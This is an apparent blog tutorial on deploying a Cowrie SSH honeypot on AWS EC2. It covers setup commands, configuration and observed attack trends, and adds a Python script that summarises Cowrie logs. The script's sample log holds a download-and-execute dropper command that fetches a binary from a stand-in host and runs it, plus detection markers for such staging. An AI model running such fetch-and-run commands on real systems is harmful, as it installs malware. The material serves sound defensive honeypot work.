How I Deployed a Cowrie Honeypot on an AWS EC2 Instance to Catch Cyber Intruders

Utkarsh Kumar

In the ever-evolving landscape of cybersecurity, staying one step ahead of malicious actors is a constant challenge. One effective strategy to gain insights into attacker behaviors is the deployment of honeypots—decoy systems designed to lure in cyber intruders. In this blog, I'll walk you through how I deployed a Cowrie honeypot on AWS to catch cyber intruders, share interesting observations from the logs, and discuss how honeypots contribute to understanding real-world attack patterns.

Introduction to Honeypots: What They Are and Why They Matter

What Is a Honeypot?

A honeypot is a security mechanism set up to detect, deflect, or study attempts at unauthorized use of information systems. It appears as a legitimate part of the network but is isolated and monitored. Honeypots serve as traps for attackers, providing valuable data on attack methodologies and vulnerabilities that malicious actors exploit.

Why Honeypots Matter

  • Threat Intelligence: Honeypots collect data on attack vectors, malware signatures, and exploit techniques.

  • Early Warning System: A honeypot has no legitimate users, so any connection to it is suspicious by definition; alerts from it carry far fewer false positives than alerts from production systems, and they can reveal scanning that other controls never logged.

  • Vulnerability Assessment: Show which services, ports and credentials attackers actually target, so patching and hardening of the real network can be prioritized accordingly.

  • Safe Observation: Provide a controlled, isolated environment to study attacker behavior without risking actual assets.

Overview of Cowrie: A Medium-Interaction SSH Honeypot

What Is Cowrie?

Cowrie is an open-source, medium-interaction SSH and Telnet honeypot designed to log brute-force attacks and shell interaction performed by attackers. Unlike low-interaction honeypots, Cowrie allows attackers to execute commands, providing deeper insights into their tactics.

Key Features of Cowrie

  • SSH and Telnet Emulation: Emulates a Linux shell over SSH and Telnet, backed by a fake filesystem, so attackers can run commands that never touch the host operating system.

  • Command Logging: Records all commands and actions performed by the intruder.

  • File Capture: Saves files that attackers fetch with wget or curl inside the emulated shell, or upload via SFTP and SCP, for later malware analysis.

  • Session Recording: Records each terminal session as a tty log that can be replayed with bin/playlog to watch the attacker's activity keystroke by keystroke.

Why Choose Cowrie?

  • Realism: Provides a realistic environment, increasing the likelihood that attackers will engage.

  • Extensibility: Ships with output plugins that forward events to JSON files, databases and SIEM/logging platforms, and can be integrated with other security tools.

  • Community Support: Active development and support from a community of cybersecurity professionals.

Steps to Deploy Cowrie on AWS (With Code Snippets)

Deploying Cowrie on AWS involves several steps, from setting up the EC2 instance to configuring the honeypot software. Below is a detailed guide to help you set up your own Cowrie honeypot.

Prerequisites

  • AWS Account: Access to AWS Management Console.

  • Basic Linux Knowledge: Familiarity with the command line and SSH.

  • Security Considerations: Ensure compliance with AWS policies and legal regulations regarding honeypot deployment.

Step 1: Launch an EC2 Instance

  1. Select AMI (Amazon Machine Image): Choose an Ubuntu Server 20.04 LTS AMI.

  2. Instance Type: Select a t2.micro instance for testing purposes.

  3. Configure Security Group: Allow inbound TCP 22 (your administrative SSH) only from your own IP address, and inbound TCP 2222 (the port Cowrie will listen on) from anywhere (0.0.0.0/0). Keeping port 22 closed to the world matters: the honeypot is meant to be attacked, the instance itself is not.

Step 2: Connect to the EC2 Instance

Use SSH to connect to your instance:

ssh -i /path/to/your/key.pem ubuntu@your-ec2-public-dns

Step 3: Update and Install Dependencies

Update the package lists and install required packages:

sudo apt update
sudo apt install -y git python3 python3-venv python3-dev libssl-dev libffi-dev build-essential

Step 4: Clone the Cowrie Repository

Clone Cowrie from GitHub:

cd /opt
sudo git clone https://github.com/cowrie/cowrie.git
sudo chown -R ubuntu:ubuntu cowrie

Step 5: Set Up a Python Virtual Environment

Create and activate a virtual environment:

cd cowrie
python3 -m venv cowrie-env
source cowrie-env/bin/activate

Step 6: Install Cowrie Dependencies

Install the required Python packages:

pip install --upgrade pip
pip install -r requirements.txt

Step 7: Configure Cowrie

Copy the sample configuration files:

cp etc/cowrie.cfg.dist etc/cowrie.cfg
cp etc/userdb.example etc/userdb.txt

Edit etc/cowrie.cfg to set up basic configurations. Cowrie reads cowrie.cfg.dist first and layers cowrie.cfg on top, so cowrie.cfg only needs the keys you change; the essential one is the SSH listen port:

[ssh]
listen_endpoints = tcp:2222:interface=0.0.0.0
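A fuller etc/cowrie.cfg, added here as an example rather than taken from the original post. Every key in it exists in Cowrie's cowrie.cfg.dist; the hostname and banner values are arbitrary choices for illustration:

```ini
# etc/cowrie.cfg (example override file; every key below exists in cowrie.cfg.dist)

[honeypot]
# Name shown in the emulated shell prompt. Use something that looks like a
# real server; "honeypot" in a prompt or banner is a giveaway.
hostname = svr04

[ssh]
enabled = true
# Unprivileged port so Cowrie can run as a normal user; redirect 22 here with
# iptables if you want the attackers that only scan port 22.
listen_endpoints = tcp:2222:interface=0.0.0.0
# SSH version banner presented to clients. Keep it consistent with the OS the
# fake shell claims to be; the default is a very old Debian OpenSSH string.
version = SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.9

[telnet]
# Telnet brings its own flood of IoT botnet traffic; enable it deliberately.
enabled = false
```

Which logins succeed is governed by etc/userdb.txt, one user:x:password entry per line, where * accepts any password and a leading ! rejects that specific one. The shipped example rejects a few obvious root passwords such as root and 123456 but lets root in with anything else, which is what makes the test login in Step 10 succeed.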

Step 8: Start Cowrie

Run Cowrie in the background:

bin/cowrie start

Verify that Cowrie is running:

bin/cowrie status

Step 9: Redirect Port 22 to Cowrie (Recommended)

Most SSH scanners only probe port 22, so a honeypot listening on 2222 alone sees a fraction of the traffic. Cowrie's documentation suggests moving your real sshd to another port (for example 22222, opened in the Security Group only to your IP) and adding an iptables NAT PREROUTING rule that redirects inbound TCP 22 to 2222; Cowrie keeps running unprivileged on 2222 while attackers see it on 22. Exposing the honeypot port is the point of the exercise; the port that must stay locked down is the one your own sshd listens on.

Step 10: Testing the Honeypot

From another machine, attempt to SSH into the honeypot:

ssh -p 2222 root@your-ec2-public-dns

You should see a fake SSH login prompt. With the sample userdb, root is accepted with almost any password (the example file rejects a few obvious ones such as root and 123456). Log in, run a few commands, and exit; the attempt shows up in var/log/cowrie/cowrie.log and, as one JSON object per event, in var/log/cowrie/cowrie.json.

Interesting Observations from Logs and Intrusions

After running Cowrie for a few days, I collected a wealth of data from various intrusion attempts.

Common Username and Password Combinations

Attackers often used default or commonly used credentials:

  • Usernames: root, admin, user, test

  • Passwords: 123456, password, admin, qwerty

Attack Patterns

  • Brute-Force Attacks: Repeated login attempts using different credential combinations.

  • Automated Scripts: Scripts attempting to execute commands to download and install malware.

  • Command Execution: Attempts to run commands like wget, curl, or chmod to manipulate the system.

Malware Samples Collected

  • Crypto Miners: Scripts to install cryptocurrency mining software.

  • Botnets: Code snippets attempting to add the honeypot to a botnet network.

  • Backdoors: Attempts to create reverse shells for persistent access.

Geographic Distribution of Attacks

By analyzing IP addresses, I found that intrusion attempts originated from:

  • China

  • Russia

  • United States

  • Brazil

Note: these are the addresses of machines that completed the TCP and SSH handshakes, so they cannot be spoofed the way a single packet can, but they are usually rented VPSs, compromised hosts or proxies rather than the attacker's own machine. Geolocation therefore tells you where the attack infrastructure sits, not who is behind it.
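Cowrie writes every event as one JSON object per line to var/log/cowrie/cowrie.json, which is the easiest place to derive the statistics above from. The script below is an added example written for this post, not part of Cowrie or of the original deployment; it uses Cowrie's real event names and field names, but the fifteen log lines embedded in it are constructed to mimic the patterns described above (credential guessing, a download-and-execute chain, reconnaissance commands), not real captures. It counts credentials, sessions per source IP and captured downloads, and flags sessions that fetch a payload and then make it executable:

```python
"""Summarise a Cowrie JSON log (var/log/cowrie/cowrie.json): an added example for
this post, not part of Cowrie. Event and field names match Cowrie's real output."""
import json
import sys
from collections import Counter, defaultdict

LOGIN_EVENTS = {"cowrie.login.failed", "cowrie.login.success"}
FETCH_MARKERS = ("wget ", "curl ", "tftp ")      # attacker pulls a payload
EXEC_MARKERS = ("chmod +x", "chmod 777", "./")   # ...and makes it runnable / runs it

# Constructed sample events: values invented, shape identical to cowrie.json
# (timestamps omitted from most lines for brevity).
SAMPLE_LOG = """\
{"eventid":"cowrie.session.connect","src_ip":"203.0.113.10","session":"a1","timestamp":"2024-01-01T00:00:00Z"}
{"eventid":"cowrie.login.failed","src_ip":"203.0.113.10","session":"a1","username":"root","password":"root"}
{"eventid":"cowrie.login.success","src_ip":"203.0.113.10","session":"a1","username":"root","password":"123456"}
{"eventid":"cowrie.command.input","src_ip":"203.0.113.10","session":"a1","input":"cd /tmp; wget http://198.51.100.5/x86 -O x86; chmod +x x86; ./x86"}
{"eventid":"cowrie.session.file_download","src_ip":"203.0.113.10","session":"a1","url":"http://198.51.100.5/x86","outfile":"var/lib/cowrie/downloads/abc","shasum":"abc"}
{"eventid":"cowrie.session.closed","src_ip":"203.0.113.10","session":"a1"}
{"eventid":"cowrie.session.connect","src_ip":"198.51.100.77","session":"b2"}
{"eventid":"cowrie.login.failed","src_ip":"198.51.100.77","session":"b2","username":"admin","password":"admin"}
{"eventid":"cowrie.login.failed","src_ip":"198.51.100.77","session":"b2","username":"admin","password":"password"}
{"eventid":"cowrie.session.closed","src_ip":"198.51.100.77","session":"b2"}
{"eventid":"cowrie.session.connect","src_ip":"203.0.113.10","session":"c3"}
{"eventid":"cowrie.login.success","src_ip":"203.0.113.10","session":"c3","username":"root","password":"qwerty"}
{"eventid":"cowrie.command.input","src_ip":"203.0.113.10","session":"c3","input":"uname -a"}
{"eventid":"cowrie.command.input","src_ip":"203.0.113.10","session":"c3","input":"cat /proc/cpuinfo | grep name | wc -l"}
{"eventid":"cowrie.session.closed","src_ip":"203.0.113.10","session":"c3"}
"""


def parse_events(text):
    """Parse one JSON object per line; skip a truncated trailing line, which
    an append-only log can have while Cowrie is still writing to it."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            events.append(json.loads(line))
        except json.JSONDecodeError:
            continue
    return events


def credential_stats(events, top=5):
    """Most-tried usernames, passwords and pairs over failed and successful logins."""
    users, passwords, pairs = Counter(), Counter(), Counter()
    successes = 0
    for e in events:
        if e.get("eventid") not in LOGIN_EVENTS:
            continue
        users[e["username"]] += 1
        passwords[e["password"]] += 1
        pairs[(e["username"], e["password"])] += 1
        successes += e["eventid"] == "cowrie.login.success"
    return {"usernames": users.most_common(top), "passwords": passwords.most_common(top),
            "pairs": pairs.most_common(top), "successful_logins": successes}


def sessions_by_ip(events):
    """Connections per source IP. src_ip comes from a completed TCP handshake,
    so it is a real endpoint, though often a proxy or compromised host."""
    return Counter(e["src_ip"] for e in events if e.get("eventid") == "cowrie.session.connect")


def downloads(events):
    """(url, sha256) for every file Cowrie captured from an in-shell wget/curl."""
    return [(e.get("url", ""), e["shasum"]) for e in events
            if e.get("eventid") == "cowrie.session.file_download"]


def flag_malware_staging(events):
    """Sessions whose command history fetches a payload and then makes it
    executable or runs it: the dropper pattern behind miners and bot loaders."""
    history = defaultdict(list)
    for e in events:
        if e.get("eventid") == "cowrie.command.input":
            history[e["session"]].append(e["input"])
    flagged = {}
    for sid, cmds in history.items():
        blob = "\n".join(cmds)
        if any(m in blob for m in FETCH_MARKERS) and any(m in blob for m in EXEC_MARKERS):
            flagged[sid] = cmds
    return flagged


def summarise(text):
    events = parse_events(text)
    return {"events": len(events), "credentials": credential_stats(events),
            "sessions_by_ip": sessions_by_ip(events).most_common(),
            "downloads": downloads(events), "staging_sessions": flag_malware_staging(events)}


if __name__ == "__main__":
    # Usage: python cowrie_summary.py var/log/cowrie/cowrie.json  (defaults to the sample)
    data = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_LOG
    print(json.dumps(summarise(data), indent=2, default=str))
```

Point it at the real cowrie.json and the same functions produce the top-credential lists, the per-IP session counts and the download hashes used in the observations above; the flagged sessions are the ones worth replaying with bin/playlog first.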

How Honeypots Help in Understanding Real-World Attack Patterns

Insight into Attacker Behavior

  • Tactics and Techniques: Understanding the methods attackers use to infiltrate systems.

  • Toolkits and Scripts: Identifying common tools and scripts used in attacks.

  • New Techniques: Occasionally surfacing tooling or post-login behaviour not yet seen elsewhere; a credential-based SSH honeypot mostly sees weak-password abuse, however, so true zero-day exploits are rare in its logs.

Enhancing Defensive Strategies

  • Improved Detection: Updating intrusion detection systems with signatures and patterns observed.

  • Patch Management: Prioritizing patches for vulnerabilities actively exploited.

  • Security Policies: Refining access controls and authentication mechanisms based on attack trends.

Contribution to the Security Community

  • Data Sharing: Providing anonymized data to security organizations and research groups.

  • Collaborative Defense: Working with others to develop countermeasures against common threats.

Conclusion

Deploying a Cowrie honeypot on AWS was an enlightening experience that provided firsthand insight into the constant probing and attacks occurring on the internet. By capturing and analyzing intrusion attempts, I gained valuable knowledge about attacker behaviors and strategies, which is crucial for strengthening cybersecurity defenses.

Key Takeaways

  • Proactive Learning: Honeypots are powerful tools for staying informed about current threats.

  • Continuous Monitoring: Regularly reviewing logs and patterns is essential for effective analysis.

  • Ethical Considerations: Ensure compliance with legal and ethical guidelines when deploying honeypots.

Resources

Disclaimer: Ensure you comply with all applicable laws and AWS policies when deploying honeypots. Unauthorized interception or monitoring of traffic may be illegal in some jurisdictions.
